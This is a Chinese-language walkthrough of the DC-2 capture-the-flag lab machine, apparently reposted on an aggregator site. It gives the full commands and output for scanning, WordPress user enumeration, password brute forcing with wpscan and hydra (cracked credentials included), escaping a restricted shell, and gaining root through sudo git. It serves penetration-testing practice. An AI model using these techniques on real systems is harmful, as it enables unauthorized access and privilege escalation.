【DC渗透系列】DC-2靶场

arp先扫

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
192.168.100.23  00:0c:29:64:16:07       VMware, Inc.
192.168.100.254 00:50:56:ef:65:1b       VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded

nmap扫

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -p- 192.168.100.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-01 19:32 EST
Nmap scan report for 192.168.100.23
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:64:16:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms 192.168.100.23OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

开了80的http端口和7744的ssh的端口
尝试浏览器访问

Hmm. We’re having trouble finding that site.We can’t connect to the server at dc-2.If that address is correct, here are three other things you can try:Try again later.Check your network connection.If you are connected but behind a firewall, check that Firefox has permission to access the Web.

url跳到http://dc-2/

修改hosts文件

/etc/hosts(linux系统)
C:\Windows\System32\drivers\etc\hosts(Windows系统)
在这里插入图片描述
就好啦
在这里插入图片描述

找到flag1

在这里插入图片描述
发现是一个wordpress搭建的网站
在这里插入图片描述
flag中提示说要登录,找不到flag2就换个号登

dirsearch扫一下登陆界面

在这里插入图片描述
找到http://dc-2/wp-admin/
在这里插入图片描述
访问成功
开始爆破
kali密码攻击工具——Cewl使用指南

┌──(root㉿kali)-[~/Desktop]
└─# cewl http://dc-2/ -w /root/Desktop/dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

在这里插入图片描述
专门针对WordPress的工具WPScan

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -e u
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.24@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] Updating the Database ...
[i] Update completed.[+] URL: http://dc-2/ [192.168.100.23]
[+] Started: Thu Feb  1 20:12:07 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.10 (Debian)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://dc-2/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).| Found By: Rss Generator (Passive Detection)|  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>|  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>[+] WordPress theme in use: twentyseventeen| Location: http://dc-2/wp-content/themes/twentyseventeen/| Last Updated: 2024-01-16T00:00:00.000Z| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt| [!] The version is out of date, the latest version is 3.5| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10| Style Name: Twenty Seventeen| Style URI: https://wordpress.org/themes/twentyseventeen/| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.2 (80% confidence)| Found By: Style (Passive Detection)|  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] admin| Found By: Rss Generator (Passive Detection)| Confirmed By:|  Wp Json Api (Aggressive Detection)|   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] jerry| Found By: Wp Json Api (Aggressive Detection)|  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1| Confirmed By:|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] tom| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Thu Feb  1 20:12:10 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 21.289 MB
[+] Memory used: 177.188 MB
[+] Elapsed time: 00:00:03

扫出三个用户名,放入user.txt

┌──(root㉿kali)-[~/Desktop]
└─# vim user.txt  ┌──(root㉿kali)-[~/Desktop]
└─# cat user.txt                               
admin
jerry
tom

开始爆破

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -U '/root/Desktop/user.txt'  -P '/root/Desktop/dict.txt' 

在这里插入图片描述

[!] Valid Combinations Found:| Username: jerry, Password: adipiscing| Username: tom, Password: parturient

jerry登录page里面找到flag2

在这里插入图片描述
提示我们;另一条路,账号名密码都有,想到前面的7744ssh端口爆破

同DC-9解法,海德拉

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L user.txt -P dict.txt ssh://192.168.100.23:7744 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-01 20:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://192.168.100.23:7744/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 571 to do in 00:04h, 13 active
[STATUS] 105.67 tries/min, 317 tries in 00:03h, 400 to do in 00:04h, 13 active
[7744][ssh] host: 192.168.100.23   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-01 20:36:40

在这里插入图片描述

ssh尝试连接

ssh登录
使用less和vi可以查看

┌──(root㉿kali)-[~]
└─# ssh tom@192.168.100.23 -p 7744 
The authenticity of host '[192.168.100.23]:7744 ([192.168.100.23]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.100.23]:7744' (ED25519) to the list of known hosts.
tom@192.168.100.23's password: The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$ 
tom@DC-2:~$ less flag3.txt

在这里插入图片描述
受限制shell(rbash–>相当于你的权限很低,很多命令用不了)的原因,命令type,cat,more,vim都无法查看

绕过rbash

法一:使用vi编辑进行绕过
(1)vi 文件名 //文件名自取
(2)输入:set shell=/bin/sh,然后回车
(3)输入:shell
(4)设置环境变量:export PATH=/usr/sbin:/usr/bin:/sbin:/bin
法二:BASH_CMDS设置shell

BASH_CMDS[x]=/bin/bash   #设置了个x变量shell 
x    #相当于执行shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

在这里插入图片描述
在这里插入图片描述
应该与jerrry有关,转到jerry目录,发现flag4

tom@DC-2:~$ ls
123  denglu  flag3.txt  tom  usr
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ cd ..
tom@DC-2:/home$ ls
jerry  tom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ 

在这里插入图片描述
还是提示git提权了

git提权

先转到jerry,密码前面找过了
在这里插入图片描述

法一:

sudo -l  //查询可用sudo命令

果然有git

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jerry may run the following commands on DC-2:(root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 
sudo git help config //强制进入交互状态
!/bin/bash  (这里bash也可以换成sh) //打开一个root权限下的shell
jerry@DC-2:~$ sudo git help config //强制进入交互状态
root@DC-2:/home/jerry# 

法二:

sudo git -p help
!/bin/bash  (这里bash也可以换成sh)

flag在root目录下

在这里插入图片描述
结束!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/667448.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

DolphinScheduler实现隔几天调度

1.场景分析 dolphinscheduler&#xff08;海豚&#xff09;定时器模块-定时调度时每3秒|每3分钟|每3天这种定时&#xff0c;不能够跨分钟&#xff0c;跨小时&#xff0c;跨月&#xff0c;每次跨月等都会从每个月的第1天&#xff08;第几天开始可以设定&#xff09;开始重新计时…

Unity3d Cinemachine篇(四)— StateDrivenCamera

文章目录 前言使用StateDrivenCamera根据不同动画切换相机1. 创建一个游戏物体2. 创建StateDrivenCamera相机3. 创建动画4. 设置相机5. 完成 前言 上一期我们简单的使用了FreeLook相机&#xff0c;这次我们来使用一下StateDrivenCamera 使用StateDrivenCamera根据不同动画切换…

docker maven插件使用介绍

1、配置docker连接 开放docker tcp连接参考本专栏下令一篇文章 2、docker service窗口 3、根据dockerfile 构建镜像 注意 idea 用通过管理员身份启动&#xff0c;否则连不上docker 构建前添加maven goal 打包 4、运行镜像 创建容器 5、运行docker compose 报错 需要先配置d…

django微博热搜数据分析与可视化系统python毕业设计

简而言之&#xff0c;数据可视化是以图形方式呈现结构化或非结构化数据&#xff0c;从而将隐藏在数据中的信息直接呈现给人们。但是有一个陷阱:它不仅仅是使用数据可视化工具将数据转化为图形。相反&#xff0c;它是从数据的角度看待世界。换句话说&#xff0c;数据可视化的对象…

(7)【Python/机器学习/深度学习】Deep-Learning模型与算法应用—深度学习基础搭建最小神经网络

目录 一、深度学习使用python建立最简单的神经元neuron 1、人工智能&机器学习&深度学习三者关系 2、机器学习& 深度学习区别 3、神经元 4、最小神经网络模型&#xff08;神经元/感知器&#xff09; 5、(案例)Predicting if a person would buy life insurn…

使用vue脚手架构建项目

一、前言 * 创建好vue-cli的环境&#xff0c;下载好vue包依赖* 本文使用环境&#xff1a;vue/cli 5.0.8二、步骤 创建vueTest文件夹&#xff0c;管理员身份运行cmd , 进入到vueTest文件夹 执行命令vue create 你的项目名 &#xff0c;这里我定义的项目名为: my-project 基于…

基于微信小程序的校园水电费管理小程序的研究与实现

博主介绍&#xff1a;✌程序员徐师兄、7年大厂程序员经历。全网粉丝12w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精彩专栏推荐订阅&#x1f447;…

DAY39: 动态规划不同路径问题62

Leetcode: 62 不同路径 机器人从(0 , 0) 位置出发&#xff0c;到(m - 1, n - 1)终点。 基本思路 1、确定dp数组&#xff08;dp table&#xff09;以及下标的含义 dp[i][j] &#xff1a;表示从&#xff08;0 &#xff0c;0&#xff09;出发&#xff0c;到(i, j) 有dp[i][j]条…

SpringBoot整合Flowable最新教程(二)启动流程

介绍 文章主要从SpringBoot整合Flowable讲起&#xff0c;关于Flowable是什么&#xff1f;数据库表解读以及操作的Service请查看SpringBoot整合Flowable最新教程&#xff08;一&#xff09;&#xff1b;   其他说明&#xff1a;Springboot版本是2.6.13&#xff0c;java版本是1…

Sentinel应用笔记

概念 当A、B、G、H掉线&#xff0c;其他服务就没法通信了 随着微服务的流行&#xff0c;服务和服务之间的稳定性变得越来越重要。Sentinel 以流量为切入点&#xff0c;从流量控制、流量路由、熔断降级、系统自适应过载保护、热点流量防护等多个维度保护服务的稳定性。 特性…

Vue3.0(二):Vue组件化基础 - 脚手架

Vue组件化基础 - 脚手架 Vue的组件化 我们在处理一些任务量比较庞大的工作时候&#xff0c;会将工作内容进行拆分&#xff0c;分步骤完成 而组件化的思想正式如此&#xff0c;对于一个庞大的项目&#xff0c;我们可以将其拆分成一个个的小功能&#xff0c;分步骤进行实现 组…

MySQL数据库基础第二篇(函数)

文章目录 一、函数介绍二、字符串函数1.练习代码2.读出结果 三、数值函数1.练习代码2.读出结果 四、日期函数1.练习代码2.读出结果 五、流程控制函数1.练习代码2.读出结果 在当代技术世界中&#xff0c;掌握数据库设计和操作的知识和技能&#xff0c;尤其是对SQL的理解&#xf…

react 之 useInperativeHandle

useInperativeHandle是通过ref暴露子组件中的方法 1.场景说明-直接调用子组件内部的方法 import { forwardRef, useImperativeHandle, useRef } from "react"// 子组件const Son forwardRef((props, ref) > {// 实现聚焦逻辑const inputRef useRef(null)const …

【C++】C++入门 — 类和对象初步介绍

类和对象 1 类的作用域2 类的实例化3 类对象模型4 this指针介绍&#xff1a;特性&#xff1a; Thanks♪(&#xff65;ω&#xff65;)&#xff89;谢谢阅读&#xff01;下一篇文章见&#xff01;&#xff01;&#xff01; 1 类的作用域 类定义了一个新的作用域&#xff0c;类的…

openGauss学习笔记-213 openGauss 性能调优-总体调优思路

文章目录 openGauss学习笔记-213 openGauss 性能调优-总体调优思路213.1 调优思路概述213.2 调优流程 openGauss学习笔记-213 openGauss 性能调优-总体调优思路 213.1 调优思路概述 openGauss的总体性能调优思路为性能瓶颈点分析、关键参数调整以及SQL调优。在调优过程中&…

uniapp 高德地图显示

1. uniapp 高德地图显示 使用前需到**高德开放平台&#xff08;https://lbs.amap.com/&#xff09;**创建应用并申请Key   登录 高德开放平台&#xff0c;进入“控制台”&#xff0c;如果没有注册账号请先根据页面提示注册账号   打开 “应用管理” -> “我的应用”页面…

vue 渲染多列表格,拖动加载

vue在使用el-table渲染多列&#xff08;几千列&#xff09;表格时&#xff0c;页面会十分卡顿&#xff0c;使用html原生表格拖动滚动条加载列&#xff0c;可以解决这个问题 后端接口返回的数据格式如下&#xff1a; line_data中的数据title对应index_title里的内容 <temp…

Linux---yum命令详解

&#x1f4d9; 作者简介 &#xff1a;RO-BERRY &#x1f4d7; 学习方向&#xff1a;致力于C、C、数据结构、TCP/IP、数据库等等一系列知识 &#x1f4d2; 日后方向 : 偏向于CPP开发以及大数据方向&#xff0c;欢迎各位关注&#xff0c;谢谢各位的支持 目录 1.概念2.yum的配置信…

【开源】WordPress一键崩溃宕机插件(整活娱乐)

插件介绍 可一键实现Wordpress崩溃宕机的整活向插件&#xff08;请勿用于非法途径&#xff0c;仅供整活娱乐&#xff09;。鼓励关注网站性能的提升&#xff0c;以提供更好的用户体验&#xff0c;提倡为用户提供良好体验和高效速度的原则。 介绍 长期以来&#xff0c;人们都在…